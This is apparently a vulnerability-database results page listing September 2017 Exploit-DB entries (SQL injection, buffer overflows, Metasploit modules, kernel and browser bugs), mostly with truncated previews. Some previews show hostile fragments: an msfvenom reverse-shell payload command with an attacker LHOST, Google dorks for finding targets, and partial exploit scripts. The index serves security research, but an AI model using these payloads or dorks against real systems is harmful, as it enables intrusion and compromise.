Lucene search
+L
ExploitdbRecent

47904 matches found

Exploit DB
Exploit DB
added 2017/09/26 12:0 a.m.85 views

NodeJS Debugger - Command Injection (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "NodeJS Debugger Command Injection", 'Description' = %q This module uses the "evaluate" request type of the NodeJS V8 debugger protocol version 1 t...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/26 12:0 a.m.29 views

Job Links - Arbitrary File Upload

Exploit Title: Job Links - Complete Job Management Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/job-links-complete-job-management-script/20672089 Demo: http://teamworktec.com/demo/job-links/ Version:...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/26 12:0 a.m.32 views

WordPress Plugin WPGYM - SQL Injection

Exploit Title: WPGYM - Wordpress Gym Management System - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/-wpgym-wordpress-gym-management-system/13352964 Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/gym/ Version...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.44 views

Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes)

Linux/x8664 - mkdir 'evil' Shellcode 30 bytes. Shellcode exploit for Linx86-64 platform / ;Title: Linux/x8664 - mkdir shellcode 30 bytes ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x8664 ;Description: Create Folder with 755...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.33 views

Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1322 The attached fuzzed MP4 file causes an out-of-bounds memory access when played with Adobe Flash Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42782.zip...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.28 views

Adobe Flash - Out-of-Bounds Read in applyToRange

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1323 The attached fuzzed file causes an out-of-bounds read in TextFormat.applyToRange. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42783.zip...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.87 views

Supervisor 3.0a1 < 3.3.2 - XML-RPC (Authenticated) Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Supervisor XML-RPC Authenticated Remote Code Execution", 'Description' = %q This module exploits a vulnerability in the Supervisor process control...

9CVSS9AI score0.87544EPSS
Exploits10
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.26 views

Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1321 The attached MP4 file causes an out-of-bounds memory access when played in flash player. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42781.zip...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.99 views

Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)

Tested on Windows XP SP3 x86 The application requires to have the web server enabled. !/usr/bin/python import socket, threading, struct host = "192.168.228.155" port = 80 def sendegghunterrequest: msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.228.158 LPORT=443 -f py buf =...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.97 views

Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow

Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow Date: 09/25/2017 Exploit Author: Charles Dardaman Twitter: https://twitter.com/CharlesDardaman Website: http://www.dardaman.com Version:9.2.0.1 Tested on: Windows 2000 SP4 CVE: 2003-0727 This is a modified stand alone exploit of...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.38 views

FLIR Thermal Camera F/FC/PT/D - Stream Disclosure

FLIR Systems FLIR Thermal Camera F/FC/PT/D Stream Disclosure Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2 FC-Series S FC-334-NTSC FC-Series ID FC-Series-R...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.63 views

FLIR Thermal Camera F/FC/PT/D - Information Disclosure

FLIR Systems FLIR Thermal Camera F/FC/PT/D Multiple Information Disclosures Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2 FC-Series S FC-334-NTSC FC-Series...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.54 views

Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1289 The exploit gains code execution on the Wi-Fi firmware on the iPhone 7. The exploit has been tested against the Wi-Fi firmware as present on iOS 10.2 14C92, but should work on all versions of iOS up to 10.3.3 included. However...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.45 views

FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access

FLIR Systems FLIR Thermal Camera F/FC/PT/D Hard-Coded SSH Credentials Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2 FC-Series S FC-334-NTSC FC-Series ID...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.40 views

FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution

!/bin/bash FLIR Systems FLIR Thermal Camera PT-Series PT-334 200562 Remote Root Exploit Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.3.4 GA, 1.3.3 GA and 1.3.2 Summary: FLIR's PT-Series of...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/25 12:0 a.m.65 views

FLIR Thermal Camera FC-S/PT - Command Injection

FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2 FC-Series S FC-334-NTSC PT-Series...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/24 12:0 a.m.56 views

HBGK DVR 3.0.0 build20161206 - Authentication Bypass

Exploit Title: HBGK DVR V3.0.0 build20161206 - Authentication Bypass Date: 24-09-2017 Vendor Homepage: http://www.hbgk.net/en/ Exploit Author: RAT - ThiefKing Contact: https://www.facebook.com/cctvsuperpassword Website: http://tromcap.com Category: webapps Tested on: V2.3.1 build20160927, V3.0.0...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/23 12:0 a.m.60 views

CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)

!/usr/bin/python Exploit Title: CyberLink LabelPrint =2.5 File Project Processing Unicode Stack Overflow Date: September 23, 2017 Exploit Author: f3ci Vendor Homepage: https://www.cyberlink.com/ Software Link:...

7.8CVSS7.9AI score0.19194EPSS
Exploits9
Exploit DB
Exploit DB
added 2017/09/22 12:0 a.m.38 views

JitBit HelpDesk < 9.0.2 - Authentication Bypass

Exploit Title: JitBit HelpDesk = 9.0.2 Broken Authentication Google Dork: "Powered by Jitbit HelpDesk" -site:jitbit.com Date: 09/22/2017 Exploit Author: Rob Simon Kc57 - TrustedSec www.trustedsec.com Vendor Homepage: https://www.jitbit.com/helpdesk/ Download Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/22 12:0 a.m.21 views

Lending And Borrowing - 'pid' SQL Injection

Exploit Title: Lending And Borrowing Script - SQL Injection Dork: N/A Date: 22.09.2017 Vendor Homepage: http://www.i-netsolution.com/ Software Link: http://www.i-netsolution.com/product/lending-borrowing-script/ Demo: http://74.124.215.220/realfund/ Version: N/A Category: Webapps Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/22 12:0 a.m.26 views

PHP Auction Ecommerce Script 1.6 - SQL Injection

Exploit Title: PHP Auction Ecommerce Script v1.6 - SQL Injection Date: 2017-09-22 Exploit Author: 8bitsec Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.phpscriptsmall.com/product/php-auction-ecommerce-script/ Version: 1.6 Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Emai...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/22 12:0 a.m.24 views

Secure E-commerce Script 1.02 - 'sid' SQL Injection

Exploit Title: Secure E-commerce Script v1.02 - SQL Injection Date: 2017-09-22 Exploit Author: 8bitsec Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.phpscriptsmall.com/product/secure-e-commerce-script/ Version: 1.02 Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/22 12:0 a.m.43 views

Cash Back Comparison Script 1.0 - SQL Injection

!/usr/bin/perl -w Exploit Title: Cash Back Comparison Script 1.0 - SQL Injection Dork: N/A Date: 22.09.2017 Vendor Homepage: http://cashbackcomparisonscript.com/ Software Link: http://cashbackcomparisonscript.com/demo/features/ Demo: http://www.cashbackcomparison.info/ Version: 1.0 Category:...

9.8CVSS9.8AI score0.0206EPSS
Exploits5
Exploit DB
Exploit DB
added 2017/09/22 12:0 a.m.28 views

Multi Level Marketing - SQL Injection

Exploit Title: Multi Level Marketing Script - SQL Injection Dork: N/A Date: 22.09.2017 Vendor Homepage: http://www.i-netsolution.com/ Software Link: http://www.i-netsolution.com/product/multi-level-marketing-script/ Demo: http://74.124.215.220/advaemlm/ Version: N/A Category: Webapps Tested on:...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/22 12:0 a.m.80 views

Stock Photo Selling 1.0 - SQL Injection

!/usr/bin/perl -w Exploit Title: Stock Photo Selling Script 1.0 - SQL Injection Dork: N/A Date: 21.09.2017 Vendor Homepage: http://sixthlife.net/ Software Link: http://sixthlife.net/product/stock-photo-selling-website/ Demo: http://www.photoreels.com/ Version: 1.0 Category: Webapps Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/22 12:0 a.m.35 views

Claydip Airbnb Clone 1.0 - Arbitrary File Upload

Exploit Title: Claydip Laravel Airbnb Clone 1.0 - Arbitrary File Upload Dork: N/A Date: 22.09.2017 Vendor Homepage: https://www.claydip.com/ Software Link: https://www.claydip.com/airbnb-clone.html Demo: https://www.claydip.com/airbnbdemo.html Version: N/A Category: Webapps Tested on:...

8.8CVSS9AI score0.0848EPSS
Exploits5
Exploit DB
Exploit DB
added 2017/09/21 12:0 a.m.99 views

Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Disk Pulse Enterprise GET Buffer Overflow', 'Description' = %q This module exploits an SEH buffer overflow in Disk Pulse Enterprise 9.9.16. If a...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/21 12:0 a.m.26 views

Microsoft Edge - Chakra Incorrectly Parses Object Patterns

function f a: b = 0x1111, c = 0x2222, .c = 0x3333 = ; f;...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/21 12:0 a.m.30 views

Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes

GetFuncExprNameReference || funcInfo-funcExprScope && funcInfo-funcExprScope-GetIsObject ... Js::RegSlot ldFuncExprDst = sym-GetLocation; this-mwriter.Reg1Js::OpCode::LdFuncExpr, ldFuncExprDst; if sym-IsInSlotfuncInfo Js::RegSlot scopeLocation; AnalysisAssertfuncInfo-funcExprScope; if...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/21 12:0 a.m.32 views

Microsoft Edge Chakra - 'JavascriptFunction::ReparseAsmJsModule' Incorrectly Re-parses

GetParseableFunctionInfo; AssertfunctionInfo; functionInfo-GetFunctionBody-AddDeferParseAttribute; functionInfo-GetFunctionBody-ResetEntryPoint; functionInfo-GetFunctionBody-ResetInParams; FunctionBody funcBody = functionInfo-ParsefunctionRef; if ENABLEPROFILEINFO // This is the first call to the...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/21 12:0 a.m.33 views

Microsoft Edge Chakra - 'Parser::ParseCatch' Does Not Handle 'eval()' (Denial of Service)

PnodeBlockType::Regular, isPattern ? ScopeTypeCatchParamPattern : ScopeTypeCatch; ... ParseNodePtr pnodePattern = ParseDestructuredLiteraltkLET, true /isDecl/, true /topLevel/, DICForceErrorOnInitializer; ... 1. "pnodeCatchScope" is a temporary block used to create a scope, and it is not actually...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/21 12:0 a.m.190 views

Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)

Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized - DoS Crash only Date: 09/21/2017 Exploit Author: Marcin Kozlowski Version: Kernel version v3.3-rc1, and thus affects all version from there on Tested on: Linux 4.4.0-93-generic 116 CVE : CVE-2017-1000251 Provided for legal securi...

8CVSS8.3AI score0.16181EPSS
Exploits12
Exploit DB
Exploit DB
added 2017/09/21 12:0 a.m.47 views

ERS Data System 1.8.1 - Java Deserialization

Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability Google Dork: N/A Date: 9/21/2017 Exploit Author: West Shepherd Vendor Homepage: http://www.ersdata.com Software Link: www.ersdata.com/downloads/ErsSetup.exe Version: 1.8.1.0 Tested on: Windows 7 x86 CVE : CVE-2017-14702 Description: E...

9.8CVSS9.6AI score0.08303EPSS
Exploits5
Exploit DB
Exploit DB
added 2017/09/21 12:0 a.m.43 views

PHPMyFAQ 2.9.8 - Cross-Site Scripting (1)

Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vendor Homepage: http://www.phpmyfaq.de/ Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip Exploit Author: Ishaq Mohammed Contact: https://twitter.com/securityprince Website: https://about.me/security-prince Category: webapps CVE: CVE-2017-1461...

4.8CVSS5.8AI score0.02432EPSS
Exploits5
Exploit DB
Exploit DB
added 2017/09/20 12:0 a.m.109 views

Android Bluetooth - 'Blueborne' Information Leak (2)

from pwn import import bluetooth if not 'TARGET' in args: log.info"Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX" exit target = args'TARGET' servicelong = 0x0100 serviceshort = 0x0001 mtu = 50 n = 30 def packetservice, continuationstate: pkt = '\x02\x00\x00' pkt += p167 + lencontinuationstate...

6.5CVSS7.7AI score0.12388EPSS
Exploits12
Exploit DB
Exploit DB
added 2017/09/20 12:0 a.m.358 views

Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)

E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html When running on Windows with HTTP PUTs enabled e.g. via setting the readonly initialisation parameter of the Default to false it was possible to upload a JSP file to the server via a specially crafte...

8.1CVSS8.6AI score0.99988EPSS
Exploits23
Exploit DB
Exploit DB
added 2017/09/19 12:0 a.m.33 views

DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "DenyAll Web Application Firewall Remote Code Execution", 'Description' = %q This module exploits the command injection vulnerability of DenyAll We...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/19 12:0 a.m.42 views

Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1309 There is a security issue in Microsoft Edge related to how HTML documents are loaded. If Edge displays a HTML document from a slow HTTP server, it is possible that a part of the document is going to be rendered before the serv...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/19 12:0 a.m.98 views

HPE < 7.2 - Java Deserialization

!/usr/bin/env python HPE/H3C IMC - Java Deserialization Exploit Version 0.1 Tested on Windows Server 2008 R2 Name HPE/H3C IMC Intelligent Management Center Java 1.8.091 Author: Raphael Kuhn Daimler TSS Special thanks to: Jan Esslinger @Hngan for the websphere exploit this one is based upon import...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/19 12:0 a.m.57 views

Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read

function go select1.multiple = false; var optgroup = document.createElement"optgroup"; select1.addoptgroup; var options = select1.options; select2 = document.createElement"select"; textarea.setSelectionRange0,1000000; select1.length = 2; document.getElementsByTagName'option'0.appendChildtextarea;...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/18 12:0 a.m.35 views

Digirez 3.4 - Cross-Site Request Forgery (Update Admin)

!/usr/local/bin/python Exploit Title: Digirez 3.4 - Cross-Site Request Forgery Update User & Admin Dork: N/A Date: 18.09.2017 Vendor Homepage: http://www.digiappz.com/ Software Link: http://www.digiappz.com/index.asp Demo: http://www.digiappz.com/room/index.asp Version: 3.4 Category: Webapps Test...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/18 12:0 a.m.32 views

Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow' (Denial of Service)

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1274 We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files: --- PAGEFAULTINNONPAGEDAREA 50 Invalid system memory was referenced. This cannot be protected by...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/18 12:0 a.m.57 views

Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath' (Denial of Service)

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1273 We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files. The most frequent one occurring for the bug reported here is as follows: --- PAGEFAULTINNONPAGEDAREA 50...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/18 12:0 a.m.32 views

Digileave 1.2 - Cross-Site Request Forgery (Update Admin)

!/usr/local/bin/python Exploit Title: Digileave 1.2 - Cross-Site Request Forgery Update User & Admin Dork: N/A Date: 18.09.2017 Vendor Homepage: http://www.digiappz.com/ Software Link: http://www.digiappz.com/digileave.asp?id=1 Demo: http://www.digiappz.com/digileave/login.asp Version: 1.2...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/18 12:0 a.m.51 views

Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1269 We have discovered that the nt!NtRemoveIoCompletion system call handler discloses 4 bytes of uninitialized pool memory to user-mode clients on 64-bit platforms. The bug manifests itself while passing the IOSTATUSBLOCK...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/18 12:0 a.m.62 views

Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1276&desc=2 We have discovered that the nt!NtGdiEngCreatePalette system call discloses large portions of uninitialized kernel stack memory to user-mode clients. This is caused by the fact that for palettes created in the PALINDEX...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/18 12:0 a.m.44 views

iBall ADSL2+ Home Router - Authentication Bypass

Exploit Title: iBall ADSL2+ Home Router Authentication Bypass Vulnerability CVE: CVE-2017-14244 Date: 15-09-2017 Exploit Author: Gem George Author Contact: https://www.linkedin.com/in/gemgrge Vulnerable Product: iBall ADSL2+ Home Router WRA150N https://www.iball.co.in/Product/ADSL2--Home-Router/7...

10CVSS9.8AI score0.17149EPSS
Exploits6
Exploit DB
Exploit DB
added 2017/09/18 12:0 a.m.41 views

Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1268 We have discovered that the nt!NtGdiGetPhysicalMonitorDescription system call discloses portions of uninitialized kernel stack memory to user-mode clients, on Windows 7 to Windows 10. This is caused by the fact that the...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/18 12:0 a.m.25 views

DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)

!/usr/local/bin/python Exploit Title: DigiAffiliate 1.4 - Cross-Site Request Forgery Update Admin Dork: N/A Date: 18.09.2017 Vendor Homepage: http://www.digiappz.com/ Software Link: http://www.digiappz.com/digiaffiliate.asp?id=7 Demo: http://www.digiappz.com/digiaffiliate/login.asp Version: 1.4...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/09/18 12:0 a.m.3661 views

Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak

!/usr/bin/env python3 Optionsbleed proof of concept test by Hanno Böck import argparse import urllib3 import re def testbleedurl, args: r = pool.request'OPTIONS', url try: allow = strr.headers"Allow" except KeyError: return False if allow in dup: return dup.appendallow if allow == "": print"empty...

7.5CVSS7AI score0.94999EPSS
Exploits9
Total number of security vulnerabilities47904